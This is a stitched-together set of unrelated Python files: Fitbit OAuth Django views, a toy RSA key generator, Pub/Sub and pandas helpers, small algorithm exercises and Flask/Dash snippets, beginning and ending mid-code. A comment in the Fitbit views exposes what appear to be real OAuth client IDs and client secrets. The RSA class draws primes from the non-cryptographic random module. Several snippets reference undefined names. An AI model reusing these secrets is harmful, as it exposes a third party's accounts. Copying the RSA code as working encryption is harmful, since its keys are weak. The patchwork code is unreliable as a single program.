            # declare the dict
            residue_contact_pairs = {}

            # get the contact atom pairs
            atom_pairs = self.get_contact_atoms(
                cutoff=cutoff,
                allchains=allchains,
                chain1=chain1,
                chain2=chain2,
                only_backbone_atoms=only_backbone_atoms,
                excludeH=excludeH,
                return_contact_pairs=True)

            # loop over the atom pair dict
            for iat1, atoms2 in atom_pairs.items():

                # get the res info of the current atom
                data1 = tuple(
                    self.get(
                        'chainID,resSeq,resName',
                        rowID=[iat1])[0])

                # create a new entry in the dict if necessary
                if data1 not in residue_contact_pairs:
                    residue_contact_pairs[data1] = set()

                # get the res info of the atom in the other chain
                data2 = self.get(
                    'chainID,resSeq,resName', rowID=atoms2)

                # store that in the dict without double
                for resData in data2:
                    residue_contact_pairs[data1].add(tuple(resData))

            # Sets become sorted lists for a deterministic result.
            for resData in residue_contact_pairs.keys():
                residue_contact_pairs[resData] = sorted(
                    residue_contact_pairs[resData])

            return residue_contact_pairs

        else:

            # get the contact atoms
            contact_atoms = self.get_contact_atoms(
                cutoff=cutoff,
                allchains=allchains,
                chain1=chain1,
                chain2=chain2,
                excludeH=excludeH,
                only_backbone_atoms=only_backbone_atoms,
                return_contact_pairs=False)

            # get the residue info
            data = dict()
            residue_contact = dict()

            for chain in contact_atoms.keys():
                data[chain] = self.get(
                    'chainID,resSeq,resName',
                    rowID=contact_atoms[chain])
                residue_contact[chain] = sorted(
                    set([tuple(resData) for resData in data[chain]]))

            return residue_contact
|
import json
import base64
import requests
import webbrowser
import pprint
from datetime import datetime, timedelta , date, time
from decimal import Decimal, ROUND_HALF_UP
import ast
import logging
from django.db.models import Q
from django.shortcuts import render
from django.core.mail import EmailMessage
from django.shortcuts import redirect
from django.http import HttpResponse
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import generics
from rest_framework import status
from rest_framework.permissions import IsAuthenticated
from .tasks import store_fitbit_data
from rauth import OAuth2Service, OAuth2Session
from .models import FitbitConnectToken,\
UserFitbitDataSleep,\
UserFitbitDataHeartRate,\
UserFitbitDataActivities,\
UserFitbitDataSteps,\
FitbitNotifications,\
UserAppTokens,\
UserAppSubscriptionToken
from hrr.models import (AaCalculations,
TimeHeartZones,
AaWorkoutCalculations,
AA)
from fitbit.fitbit_push import store_data,session_fitbit,get_client_id_secret,include_resting_hr
import quicklook.calculations.converter
from quicklook.calculations.converter.fitbit_to_garmin_converter import fitbit_to_garmin_activities
from django.conf import settings
# Create your views here.
redirect_uri = settings.FITBIT_REDIRECT_URL
# def get_client_id_secret(user):
# '''
# This function get the client id and client secret from databse for respective use
# if not then provide jvb app client id,secret
# '''
# try:
# user_app_tokens = UserAppTokens.objects.get(user=user)
# client_id = user_app_tokens.user_client_id
# client_secret = user_app_tokens.user_client_secret
# except:
# client_id = settings.FITBIT_CONSUMER_ID
# client_secret = settings.FITBIT_CONSUMER_SECRET
# return client_id,client_secret
class FitbitPush(APIView):
    '''
    This view will receive fitbit push notification data and
    call the signal to store that data in database
    '''

    def post(self, request, format="json"):
        # Hand the notification payload off to the Celery task and answer
        # immediately with 204 so Fitbit does not retry the delivery.
        data = request.data
        store_fitbit_data.delay(data)
        return Response(status=status.HTTP_204_NO_CONTENT)

    def get(self, request, format="json"):
        # Fitbit subscriber-endpoint verification: respond 204 when the
        # ?verify= code matches any stored subscription token, 404 otherwise.
        # verify_codes = ['116ac5efa95d30cb8f4d4118a3a6845e4b16220c8b3839bac4002db982804c3a',
        # '4d48c7d06f18f34bb9479af97d4dd82732885d3adbeda22c1ce79c559189900c',
        # '5ab5902e4e30d983e32f0927b2e087824b923759f482798a5cb242b59c122afa',
        # 'c48e07b496216e1016bf5029a6e6089e238d1dcf135a5296607c3a8377308a53',
        # 'fde3ef2d376adfaa762560aa942fa9e07a96a1a1e5e8e3c711eb1b26df4dc919',
        # '6c1d1f97ebe6fd810652d2d655bd8b0cc56f66b64473cab2f2597f03293a8a4e']
        all_sub_tokens = UserAppSubscriptionToken.objects.all()
        verify_codes = []
        for single_token in all_sub_tokens:
            verify_codes.append(single_token.user_subscription_token)
        verification_code = request.query_params
        verify_code = verification_code.get('verify', '')
        if verify_code in verify_codes:
            return Response(status=status.HTTP_204_NO_CONTENT)
        else:
            return Response(status=status.HTTP_404_NOT_FOUND)
def refresh_token(user):
    '''
    Refresh the user's expired Fitbit OAuth tokens and store them.

    Returns:
        (refresh_token, access_token) tuple on success, None when Fitbit
        returned an error payload instead of fresh tokens.
    '''
    client_id, client_secret = get_client_id_secret(user)
    access_token_url = 'https://api.fitbit.com/oauth2/token'
    token = FitbitConnectToken.objects.get(user=user)
    client_id_secret = '{}:{}'.format(client_id, client_secret).encode()
    headers = {
        'Authorization': 'Basic' + ' ' + base64.b64encode(client_id_secret).decode('utf-8'),
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    data = {
        'grant_type': 'refresh_token',
        'refresh_token': token.refresh_token,
    }
    request_data = requests.post(access_token_url, headers=headers, data=data)
    request_data_json = request_data.json()
    pprint.pprint(request_data_json)
    # BUG FIX: the old code called fetching_data_fitbit(request) here, but
    # `request` does not exist in this function's scope; the resulting
    # NameError was silently swallowed by a bare `except`, so the call never
    # actually ran. It has been removed, and the except is narrowed so real
    # failures are no longer hidden.
    try:
        token.refresh_token = request_data_json['refresh_token']
        token.access_token = request_data_json['access_token']
        token.save()
    except KeyError:
        # Fitbit returned an error payload without the expected token keys.
        logging.exception("message")
        return None
    return (request_data_json['refresh_token'], request_data_json['access_token'])
def fitbit_user_subscriptions(user):
    """Register this user's Fitbit push subscriptions (generic plus the
    activities/foods/sleep/body collections)."""
    service = session_fitbit(user)
    tokens = FitbitConnectToken.objects.get(user=user)
    subscriber_id = tokens.user_id_fitbit
    session = service.get_session(tokens.access_token)
    session.post("https://api.fitbit.com/1/user/-/apiSubscriptions/{}.json".format(
        subscriber_id))
    session.post(
        "https://api.fitbit.com/1/user/-/activities/apiSubscriptions/{}-activities.json".format(
            subscriber_id))
    session.post(
        "https://api.fitbit.com/1/user/-/foods/apiSubscriptions/{}-foods.json".format(
            subscriber_id))
    session.post(
        "https://api.fitbit.com/1/user/-/sleep/apiSubscriptions/{}-sleep.json".format(
            subscriber_id))
    session.post(
        "https://api.fitbit.com/1/user/-/body/apiSubscriptions/{}-body.json".format(
            subscriber_id))
    return None
# def include_resting_hr(heartrate_fitbit_intraday,heartrate_fitbit):
# try:
# heartrate_fitbit_intraday_json = ''
# heartrate_fitbit_json = ''
# if heartrate_fitbit_intraday:
# heartrate_fitbit_intraday_json = heartrate_fitbit_intraday.json()
# if heartrate_fitbit:
# heartrate_fitbit_json = heartrate_fitbit.json()
# if heartrate_fitbit_intraday_json and heartrate_fitbit_json:
# if heartrate_fitbit_json['activities-heart'][0]["value"].get("restingHeartRate"):
# heartrate_fitbit_intraday_json['activities-heart'][0]["restingHeartRate"] = heartrate_fitbit_json['activities-heart'][0]["value"].get("restingHeartRate")
# return heartrate_fitbit_intraday_json
# elif heartrate_fitbit_json:
# return heartrate_fitbit_json
# else:
# return {}
# except:
# return {}
def api_fitbit(session, date_fitbit):
    '''
    Takes session and start date then call the fitbit api,return the fitbit api
    responses as (sleep, activity, heartrate, steps).
    '''
    heartrate_fitbit_intraday = ''
    heartrate_fitbit = ''
    sleep_fitbit = session.get("https://api.fitbit.com/1.2/user/-/sleep/date/{}.json".format(date_fitbit))
    activity_fitbit = session.get(
        "https://api.fitbit.com/1/user/-/activities/list.json?afterDate={}&sort=asc&limit=10&offset=0".format(
            date_fitbit))
    try:
        # Intraday (1-second) heart rate requires special API access; fall
        # back to '' when the request itself fails.
        heartrate_fitbit_intraday = session.get(
            "https://api.fitbit.com/1/user/-/activities/heart/date/{}/1d/1sec/time/00:00/23:59.json".format(date_fitbit))
    except:
        pass
    heartrate_fitbit_normal = session.get(
        "https://api.fitbit.com/1/user/-/activities/heart/date/{}/1d.json".format(date_fitbit))
    # Merge the daily resting heart rate into the intraday payload (falls
    # back to the daily payload or {} — see include_resting_hr).
    heartrate_fitbit = include_resting_hr(heartrate_fitbit_intraday, heartrate_fitbit_normal)
    try:
        steps_fitbit = session.get(
            "https://api.fitbit.com/1/user/-/activities/steps/date/{}/1d/1min/time/00:00/23:59.json".format(date_fitbit))
    except:
        # Without intraday access, use the daily step summary instead.
        steps_fitbit = session.get(
            "https://api.fitbit.com/1/user/-/activities/steps/date/{}/1d.json".format(date_fitbit))
    return (sleep_fitbit, activity_fitbit, heartrate_fitbit, steps_fitbit)
def request_token_fitbit(request):
    """Redirect the user to Fitbit's OAuth2 authorization page with the full
    scope list this app needs."""
    client_id, client_secret = get_client_id_secret(request.user)
    service = OAuth2Service(
        client_id=client_id,
        client_secret=client_secret,
        access_token_url='https://api.fitbit.com/oauth2/token',
        authorize_url='https://www.fitbit.com/oauth2/authorize',
        base_url='https://fitbit.com/api')
    scopes = ['activity', 'nutrition', 'heartrate', 'location',
              'profile', 'settings', 'sleep', 'social', 'weight']
    authorize_url = service.get_authorize_url(
        redirect_uri=redirect_uri,
        response_type='code',
        scope=' '.join(scopes))
    return redirect(authorize_url)
def receive_token_fitbit(request):
    """OAuth2 callback: exchange the authorization code for tokens, persist
    them (create or update) and register the user's Fitbit subscriptions."""
    client_id, client_secret = get_client_id_secret(request.user)
    access_token_url = 'https://api.fitbit.com/oauth2/token'
    # NOTE: authorize_url and base_url are currently unused here.
    authorize_url = 'https://www.fitbit.com/oauth2/authorize'
    base_url = 'https://fitbit.com/api'
    authorization_code = request.GET.get('code', None)
    if authorization_code:
        client_id_secret = '{}:{}'.format(client_id, client_secret).encode()
        headers = {
            'Authorization': 'Basic' + ' ' + base64.b64encode(client_id_secret).decode('utf-8'),
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        # NOTE(review): the 'clientId' key looks non-standard for an OAuth2
        # token request (usually 'client_id') — the Basic auth header likely
        # makes it redundant; confirm against the Fitbit API docs.
        data = {
            'clientId': client_id,
            'grant_type': 'authorization_code',
            'redirect_uri': redirect_uri,
            'code': authorization_code
        }
        r = requests.post(access_token_url, headers=headers, data=data)
        a = r.json()
        try:
            # Update the existing token row when the user already connected.
            token = FitbitConnectToken.objects.get(user=request.user)
            if token:
                setattr(token, "refresh_token", a['refresh_token'])
                setattr(token, "access_token", a['access_token'])
                setattr(token, "user_id_fitbit", a['user_id'])
                token.save()
        except FitbitConnectToken.DoesNotExist:
            # First connection: create the token row.
            FitbitConnectToken.objects.create(
                user=request.user, refresh_token=a['refresh_token'],
                access_token=a['access_token'], user_id_fitbit=a['user_id'])
        fitbit_user_subscriptions(request.user)
    return redirect('/service_connect_fitbit')
def fetching_data_fitbit(request):
    """Fetch one day of Fitbit data for the requesting user, store it and
    return the combined payload as JSON.

    Reads ?start_date=YYYY-MM-DD from the query string, pulls sleep,
    activity, heart-rate and step data via api_fitbit(), persists it with
    store_data() and returns everything as an application/json response.
    """
    start_date_str = request.GET.get('start_date', None)
    start_date = datetime.strptime(start_date_str, "%Y-%m-%d").date()
    service = session_fitbit(request.user)
    tokens = FitbitConnectToken.objects.get(user=request.user)
    access_token = tokens.access_token
    session = service.get_session(access_token)
    date_fitbit = start_date
    sleep_fitbit, activity_fitbit, heartrate_fitbit, steps_fitbit = api_fitbit(session, date_fitbit)
    # checking status
    statuscode = sleep_fitbit.status_code
    #converting str to dict
    sleep_fitbit = sleep_fitbit.json()
    activity_fitbit = activity_fitbit.json()
    heartrate_fitbit = heartrate_fitbit  # already a dict (see api_fitbit)
    steps_fitbit = steps_fitbit.json()
    if statuscode == 401:  # if status 401 means fitbit tokens are expired below does generate tokens
        if sleep_fitbit['errors'][0]['errorType'] == 'expired_token':
            user = request.user
            refresh_token(user)
    # NOTE(review): after a 401 the tokens are refreshed, but the expired
    # (error) payloads fetched above are still stored and returned below —
    # confirm whether a retry with the new tokens is expected elsewhere.
    fitbit_all_data = {}
    fitbit_all_data['sleep_fitbit'] = sleep_fitbit
    fitbit_all_data['activity_fitbit'] = activity_fitbit
    fitbit_all_data['heartrate_fitbit'] = heartrate_fitbit
    fitbit_all_data['steps_fitbit'] = steps_fitbit
    store_data(fitbit_all_data, request.user, start_date_str, create_notification=None)
    fitbit_data = {"sleep_fitbit": sleep_fitbit,
                   "activity_fitbit": activity_fitbit,
                   "heartrate_fitbit": heartrate_fitbit,
                   "steps_fitbit": steps_fitbit}
    data = json.dumps(fitbit_data)
    return HttpResponse(data, content_type='application/json')
# def refresh_token_fitbit(request):
# client_id='22CN2D'
# client_secret='e83ed7f9b5c3d49c89d6bdd0b4671b2b'
# access_token_url='https://api.fitbit.com/oauth2/token'
# token = FitbitConnectToken.objects.get(user = request.user)
# refresh_token_acc = token.refresh_token
# client_id_secret = '{}:{}'.format(client_id,client_secret).encode()
# headers = {
# 'Authorization':'Basic'+' '+base64.b64encode(client_id_secret).decode('utf-8'),
# 'Content-Type':'application/x-www-form-urlencoded'
# }
# data = {
# 'grant_type' : 'refresh_token',
# 'refresh_token': refresh_token_acc,
# }
# r = requests.post(access_token_url,headers=headers,data=data)
# a = r.json()
#print(type(a))
'''
jvb
client id ---- 22CN2D
client secret ---- e83ed7f9b5c3d49c89d6bdd0b4671b2b
redirect url ---- https://app.jvbwellness.com/callbacks/fitbit
test
client id ---- 22CN2D
client secret ---- 94d717c6ec36c270ed59cc8b5564166f
redirect url ---- http://127.0.0.1:8000/callbacks/fitbit
'''
# def call_push_api():
# '''
# This function takes the notificatin messages which are stored in last 10 min
# creates a session
# '''
# print("Startes for checking notifications in database")
# time = datetime.now() - timedelta(minutes=15)
# updated_data = FitbitNotifications.objects.filter(Q(created_at__gte=time))
# if updated_data:
# service = session_fitbit()
# tokens = FitbitConnectToken.objects.get(user = request.user)
# access_token = tokens.access_token
# session = service.get_session(access_token)
# for i,k in enumerate(updated_data):
# k = ast.literal_eval(k.data_notification)
# date = k[i]['date']
# user_id = k[i]['ownerId']
# data_type = k[i]['collectionType']
# try:
# user = FitbitConnectToken.objects.get(user_id_fitbit=user_id).user
# except FitbitConnectToken.DoesNotExist as e:
# user = None
# call_api(date,user_id,data_type,user,session)
# return HttpResponse('Final return')
# return None
# def call_api(date,user_id,data_type,user,session):
# '''
# This function call push notification messages and then store in to the
# database
# Args: date(date which comes in push message)
# user_id
# data_type(type of data)
# user(user instance)
# session(created sesssion)
# Return: returns nothing
# '''
# if data_type == 'sleep':
# sleep_fitbit = session.get(
# "https://api.fitbit.com/1.2/user/{}/{}/date/{}.json".format(
# user_id,data_type,date))
# sleep_fitbit = sleep_fitbit.json()
# store_data(sleep_fitbit,user,date,data_type='sleep_fitbit')
# elif data_type == 'activities':
# activity_fitbit = session.get(
# "https://api.fitbit.com/1/user/{}/activities/list.json?afterDate={}&sort=asc&limit=10&offset=0".format(
# user_id,date))
# heartrate_fitbit = session.get(
# "https://api.fitbit.com/1/user/{}/activities/heart/date/{}/1d.json".format(
# user_id,date_fitbit))
# steps_fitbit = session.get(
# "https://api.fitbit.com/1/user/{}/activities/steps/date/{}/1d.json".format(
# user_id,date_fitbit))
# if activity_fitbit:
# activity_fitbit = activity_fitbit.json()
# store_data(activity_fitbit,user,date,data_type)
# if heartrate_fitbit:
# heartrate_fitbit = heartrate_fitbit.json()
# store_data(heartrate_fitbit,user,date,data_type="heartrate_fitbit")
# if steps_fitbit:
# steps_fitbit = steps_fitbit.json()
# store_data(steps_fitbit,user,date,data_type="steps_fitbit")
# return None
|
from random import *
from math import *
from os import urandom
class Key:
    """RSA key-pair generator.

    getKeys() returns [[e, n], [d, n]] — the public and private exponents
    sharing modulus n, built from two random primes of `bitSize` bits.
    """

    def __init__(self, bitSize):
        # Bit length of each generated prime.
        self.__bitSize = bitSize

    def __isPrime(self, n):
        """Deterministic trial-division primality test (fine for small sizes)."""
        if n == 2 or n == 3:
            return True
        if n % 2 == 0 or n < 2:
            return False
        for i in range(3, int(n**0.5)+1, 2):  # only odd numbers
            if n % i == 0:
                return False
        return True

    def __randBitNumber(self):
        # Random integer with exactly __bitSize bits (top bit set).
        return randint(2**(self.__bitSize-1)+1, 2**self.__bitSize)

    def __getPrime(self):
        """Draw random __bitSize-bit numbers until one is prime."""
        num = self.__randBitNumber()
        while not self.__isPrime(num):
            num = self.__randBitNumber()
        return num

    def __isRelativePrime(self, a, b):
        """Return True if gcd(a, b) == 1, i.e. lcm(a, b) == a*b."""
        m = a*b
        while a != 0 and b != 0:
            if a > b:
                a %= b
            else:
                b %= a
        # After the loop one of a, b is 0, so a+b is gcd(a, b).
        lcm = m // (a+b)
        if lcm == m:
            return True
        else:
            return False

    def __getRealativePrime(self, a):
        """Return the smallest integer >= 3 that is coprime with a."""
        # NOTE: a**1/2 evaluates to a/2, not sqrt(a); it is a generous upper
        # bound for the search and is kept as-is.
        for i in range(3, int(a**1/2)):
            if self.__isRelativePrime(i, a):
                return i
        raise Exception("Не удалось найти относительно простое число.")

    def getD(self, a, b):
        """Extended Euclid: return (gcd, x, y) with a*x + b*y == gcd."""
        if b == 0:
            return a, 1, 0
        else:
            d, x1, y1 = self.getD(b, a % b)
            x = y1
            y = x1 - (a//b)*y1
            return d, x, y

    def __test(self, keys):
        """Check the key pair round-trips a sample message."""
        test = 2
        # BUG FIX: use 3-argument pow() for modular exponentiation. The old
        # `test**d % n` computed the full power before reducing, which is
        # astronomically slow for realistic exponent sizes.
        encrypt = pow(test, keys[0][0], keys[0][1])
        decrypt = pow(encrypt, keys[1][0], keys[1][1])
        return test == decrypt

    def getKeys(self):
        """Generate and return [[e, n], [d, n]] (public key, private key)."""
        testFlag = False
        while not testFlag:
            p = self.__getPrime()
            q = self.__getPrime()
            n = p * q
            eler = (p-1) * (q-1)   # Euler's totient of n
            e = self.__getRealativePrime(eler)
            d = self.getD(e, eler)[1]
            if d < 0:
                # Canonicalize d into [0, eler). Equivalent modulo eler to
                # the old `d + abs(d)*e + 1` trick, but obviously correct.
                d %= eler
            testFlag = self.__test([[e, n], [d, n]])
        #open key, close key
        return [[e, n], [d, n]]
|
import os
import json
import base64
from flask import jsonify
from google.cloud import pubsub_v1
def publish_to_pubsub(topic, data, message=None, project_id=None):
    """
    Send a message with a JSON data payload to Pub/Sub.

    Args:
        topic: Pub/Sub topic name (without the project prefix).
        data: JSON-serializable payload, sent as the message body.
        message: optional string attribute identifying the upstream source.
        project_id: GCP project ID; falls back to the PROJECT_ID env var.

    Returns:
        The published message ID as a string.
    """
    project_id = project_id or os.environ.get('PROJECT_ID')
    publisher = pubsub_v1.PublisherClient()
    topic_name = f'projects/{project_id}/topics/{topic}'
    payload = json.dumps(data).encode("utf-8")
    if message is not None:
        future = publisher.publish(topic_name, payload, message=message.encode("utf-8"))
    else:
        future = publisher.publish(topic_name, payload)
    result = str(future.result())
    # BUG FIX: previously printed {"published_message_id", result} — a set
    # literal; a labeled dict was clearly intended.
    print({"published_message_id": result})
    return result
def unpack_event(event):
    """Decode a Pub/Sub push event into ``(data, attributes)``.

    ``event['data']`` is base64-encoded UTF-8 JSON; ``event['attributes']``
    is returned as-is.
    """
    raw = base64.b64decode(event['data'])
    payload = json.loads(raw.decode('utf-8'))
    return payload, event['attributes']
def request_to_pubsub(request, topic=None, validation_func=None):
    """
    Responds to a request to publish
    Args:
        request (flask.Request): HTTP request object with JSON payload. Payload should have the following schema:
            {
                "message": "blah", # Will be used to ID the message upstream source in pubsub
                "data": {} # Will be passed as a JSON payload to the target Topic as an argument called data
            }
        topic: Pub/Sub topic to add the message to.
        validation_func: Function to validate a JSON payload and throw a BadRequest exception if it doesn't validate.
    Returns:
        JSON message in response.
    """
    payload = request.get_json(force=True)
    # Bug fix: the original printed the *set* {"payload", payload}, which raises
    # TypeError when payload is a dict (dicts are unhashable); print a mapping.
    print({"payload": payload})
    # Topic resolution order: explicit arg, request body, environment.
    topic = topic or payload.get('topic') or os.environ.get('TOPIC_NAME')
    if topic is None:
        raise EnvironmentError('topic must be specified in the parameters or request as "topic" '
                               'or environment as TOPIC_NAME')
    if validation_func is not None and callable(validation_func):
        validation_func(payload=payload)
    result = publish_to_pubsub(topic=topic, message=f"request forwarded from {request.full_path}", data=payload)
    return jsonify({'message_id': result})
|
import pandas as pd
def load_comparisonXL(method, evaluate="train", dropna=True):
    """Load and merge per-method comparison tables from Excel files.

    Args:
        method: list of file paths (without the ".xlsx" suffix).
        evaluate: evaluation split to select: "train" (default), "test",
            "in bag" or "out of bag".
        dropna: when True, drop columns that are entirely NaN.

    Returns:
        DataFrame with one row per method, prefixed with a "method" column
        holding each file's base name.
    """
    # Map the split name to the string stored in the sheet's 'evaluate' column.
    split_labels = {"test": "['Test']",
                    "in bag": "['In Bag']",
                    "out of bag": "['Out of Bag']"}
    e = split_labels.get(evaluate, "['Train']")
    # Import methods
    table = [pd.read_excel(i + ".xlsx") for i in method]
    # Concatenate the selected row of each table as one column, then transpose.
    df = pd.DataFrame()
    for t in table:
        df = pd.concat([df, t.loc[t['evaluate'] == e].T.squeeze()], axis=1, sort=False)
    df = df.T.drop(columns="evaluate")
    # Remove the surrounding "['...']" decoration from string cells.
    for i in range(len(df)):
        for j in range(len(df.T)):
            if isinstance(df.iloc[i, j], str):
                df.iloc[i, j] = df.iloc[i, j][2: -2]
    # Reset index and add methods column
    method_name = [m.rsplit('/', 1)[1] for m in method]
    df = df.reset_index()
    df = pd.concat([pd.Series(method_name, name="method"), df], axis=1, sort=False)
    # Bug fix: df.drop("index", 1) used a positional axis argument, removed in
    # pandas 2.0; use the explicit columns= keyword.
    df = df.drop(columns="index")
    #df = df.set_index("method")
    # drop columns with just nans
    if dropna is True:
        df = df.dropna(axis=1, how='all')
    return df
|
def UKnapsack(N, s, weights=None, values=None):
    """Solve the unbounded knapsack problem (items may be reused).

    Args:
        N: number of item types.
        s: knapsack capacity.
        weights, values: per-item weights and values; default to the
            module-level ``wt`` and ``val`` lists (original script interface).

    Returns:
        Maximum total value achievable with capacity ``s``.
    """
    global dp
    if weights is None:
        weights = wt
    if values is None:
        values = val
    # Fresh table; table[i][j] = best value using the first i item types at capacity j.
    table = [[0] * (s + 1) for _ in range(N + 1)]
    for i in range(1, N + 1):
        for j in range(1, s + 1):
            if weights[i - 1] > j:
                # Bug fix: the original compared the weight against the *total*
                # capacity ``s`` instead of the current capacity ``j``, letting
                # ``j - wt[i-1]`` go negative and index from the end of the row.
                table[i][j] = table[i - 1][j]
            else:
                table[i][j] = max(table[i - 1][j],
                                  values[i - 1] + table[i][j - weights[i - 1]])
    dp = table  # preserve the original side effect of populating the global table
    return table[-1][-1]
# --- Interactive driver: read item count, weights, values and capacity ------
N = int (input("Enter the number of inputs : "))
# Weights and values are whitespace-separated integers (read without a prompt).
wt = list(map(int , input().split()))
val = list(map(int , input().split()))
max_cap = int(input("Enter max cap : "))
# DP table shared with UKnapsack via module globals.
dp = [[0 for i in range(max_cap + 1)]for j in range(N + 1)]
print(UKnapsack(N,max_cap))
|
def reverse(string):
    """Return ``string`` reversed (recursively).

    Bug fix: the base case now accepts strings of length 0 or 1 — the
    original indexed ``string[-1]`` on the empty string, raising IndexError.
    """
    if len(string) <= 1:
        return string
    return string[-1] + reverse(string[:-1])
|
# Extract the floating-point confidence value from a mail-header line.
text = "X-DSPAM-Confidence: 0.8475"
# Bug fix: the original anchored on find("0") and find("5"), which only works
# while those digits don't appear elsewhere in the header; parse everything
# after the colon instead.
numbers1 = text.find(":") + 1
print(numbers1)
ftnumbers = float(text[numbers1:].strip())
print(ftnumbers)
#!/usr/bin/env python3
from hue import HueControlUtil as hue
from wemo import WemoControlUtil as wemo
from alexa import AlexaControlUtil as alexa
import time, os, sys, argparse
from datetime import datetime
class Recipe(object):
    """Base class for automation recipes; subclasses implement the hooks."""
    def __init__(self):
        pass
    def run(self):
        # Poll the trigger and perform the action when it fires.
        pass
    def getTriggerState(self):
        # Read the current state of the trigger device.
        pass
    def executeAction(self):
        # Perform the recipe's action.
        pass
class WemoHueRecipe(Recipe):
    """Recipe: when the named WeMo switch turns ON, turn on a Hue light.

    Keeps a bounded history of (state, timestamp) trigger transitions.
    """
    def __init__(self, wemoController, hueController, switchName, lightId):
        self.wemoController = wemoController
        self.hueController = hueController
        self.lightId = lightId          # Hue light to control
        self.switchName = switchName    # WeMo switch acting as the trigger
        # Seed the history with the switch's current state.
        self.triggerStateList = [(self.wemoController.getSwitchState(switchName), datetime.now())]
        print("triggerState", self.triggerStateList)
        self.eventList = []     # timestamps of fired actions
        self.queueSize = 50     # maximum history length
    def run(self):
        """Poll the switch; on a transition to ON, light the Hue lamp."""
        newState = self.wemoController.getSwitchState(self.switchName)
        if newState == self.triggerStateList[-1][0]:
            return  # no state change since the last poll
        self.triggerStateList.append((newState, datetime.now()))
        print("triggerStateList", self.triggerStateList)
        # Only the OFF->ON transition triggers the action; OFF is just recorded.
        if newState == 1:
            print("execute action")
            self.hueController.turnonLight(self.lightId)
            self.eventList.append(datetime.now())
        # Bound the history (== is sufficient: the list grows one entry per call).
        if len(self.triggerStateList) == self.queueSize:
            self.triggerStateList.pop(0)
if __name__ == "__main__":
    # CLI: light id, polling interval (seconds), and local WeMo callback port.
    parser = argparse.ArgumentParser()
    parser.add_argument("-lightId", default = 2, type = int)
    parser.add_argument("-sleep", default = 1, type = float)
    parser.add_argument("-wemoport", type = int, default = 10085)
    options = parser.parse_args()
    hueController = hue.HueController()
    bind = "0.0.0.0:{}".format(options.wemoport)
    switchName = "WeMo Switch1"
    lightId = options.lightId
    wemoController = wemo.WemoController(bind = bind)
    switch = wemoController.discoverSwitch(switchName)
    if switch is None:
        print("error to locate the switch")
        sys.exit(1)
    else:
        print("switch discoverred")
    #test recipe: when wemo switch is truned on, turn on lights in living room
    # Blink the light once to confirm connectivity before starting the loop.
    hueController.turnonLight(lightId)
    time.sleep(3)
    hueController.turnoffLight(lightId)
    recipe = WemoHueRecipe(wemoController, hueController, switchName, lightId)
    recipeList = [recipe]
    # Poll every recipe forever at the configured interval.
    while True:
        time.sleep(options.sleep)
        for recipe in recipeList:
            recipe.run()
|
import dash_bootstrap_components as dbc
from dash import Input, Output, html
# Navigation layout: three NavLink variants plus a button-style link whose
# click count is rendered into the paragraph below it by a callback.
nav = html.Div(
    [
        dbc.Nav(
            [
                dbc.NavLink("Internal link", href="/l/components/nav"),
                dbc.NavLink("External link", href="https://github.com"),
                # external_link=True forces a full page load even for a
                # same-site relative href.
                dbc.NavLink(
                    "External relative",
                    href="/l/components/nav",
                    external_link=True,
                ),
                dbc.NavLink("Button", id="button-link", n_clicks=0),
            ]
        ),
        html.Br(),
        html.P(id="button-clicks"),
    ]
)
@app.callback(
    Output("button-clicks", "children"), [Input("button-link", "n_clicks")]
)
def show_clicks(n):
    """Render the click counter for the button-style nav link.

    NOTE(review): ``app`` is not defined in this file — it must exist in the
    importing scope for the decorator to resolve.
    """
    return f"Button clicked {n} times"
|
# Import flask dependencies
from flask import Blueprint, jsonify, request, render_template, \
flash, g, session, redirect, url_for
# Import password / encryption helper tools
from werkzeug import check_password_hash, generate_password_hash
import calendar
from datetime import datetime, timedelta
# Import the database object from the main app module
from app import db
# Import module forms
from app.weather.forms import CreateWeatherForm
# Import module models (i.e. Weather)
from app.weather.models import Weather
import json
from app.public.helper import get_operating_hours
# Define the blueprint: 'weather', set its url prefix: app.url/weather
# Static assets are served from the package-relative ../static directory.
weather = Blueprint('weather', __name__, url_prefix='/weather', static_folder="../static")
@weather.route("/daily")
@weather.route("/daily/<date>")
def daily(date=None):
    """Render the daily weather chart for ``date`` (YYYY-MM-DD string).

    Bug fixes:
    - the default date was ``datetime.now()`` evaluated in the signature,
      i.e. frozen once at import time; it is now computed per request;
    - ``except ValueError, TypeError`` (Python 2 syntax) caught only
      ValueError and bound it to the name TypeError; both are caught now.
    """
    if date is None:
        date = datetime.now().strftime('%Y-%m-%d')
    try:
        current_date = datetime.strptime(date, "%Y-%m-%d")
    except (ValueError, TypeError):
        # Fall back to a fixed date known to have data.
        current_date = datetime.strptime('2014-04-21', "%Y-%m-%d")
    yesterday = current_date - timedelta(days=1)
    tomorrow = current_date + timedelta(days=1)
    # Readings within [current_date, tomorrow).
    w = Weather.query.with_entities(Weather.created_at, Weather.temp).filter(
        Weather.created_at > current_date.strftime('%Y-%m-%d')).filter(
        Weather.created_at < tomorrow.strftime('%Y-%m-%d')).all()
    # Millisecond epoch timestamps (fractional seconds stripped).
    timestamps_w = [
        1000 * calendar.timegm(datetime.strptime(d.created_at.split(".")[0], "%Y-%m-%d %H:%M:%S").timetuple())
        for d in w]
    series_w = [(int(d.temp or 0)) for d in w]
    daily_chart_data = [list(x) for x in zip(timestamps_w, series_w)]
    print(daily_chart_data)
    return render_template("weather/daily.html", data=daily_chart_data, yesterday=yesterday,
                           today=current_date, tomorrow=tomorrow, all_data=w)
@weather.route("/tempature")
@weather.route("/tempature/<date>")
def getTempature(date=None):
    """Return the latest temperature reading as JSON ``[timestamp_ms, temp]``.

    Bug fix: the "/tempature/<date>" route passes a ``date`` argument the
    function did not accept, which raised TypeError; it is now accepted
    (and currently ignored — the newest reading is always returned).
    """
    obj = Weather.query.with_entities(Weather.created_at, Weather.temp).order_by(Weather.created_at.desc()).first()
    # Millisecond epoch timestamp of the reading (fractional seconds stripped).
    timestamps_w = 1000 * calendar.timegm(datetime.strptime(obj.created_at.split(".")[0], "%Y-%m-%d %H:%M:%S").timetuple())
    series_w = int(obj.temp or 0)
    return json.dumps([timestamps_w, series_w])
|
# -*- coding: utf-8 -*-
from collections import Counter, defaultdict, deque
class Solution:
    def minWindow(self, s, t):
        """Return the smallest substring of ``s`` containing every character
        of ``t`` with multiplicity, or "" if no such window exists.
        """
        need = Counter(t)
        # Most recent need[ch] positions of each required character.
        positions = defaultdict(deque)
        lo, hi, width = 0, len(s) - 1, len(s) + 1  # width == len(s)+1 => none found yet
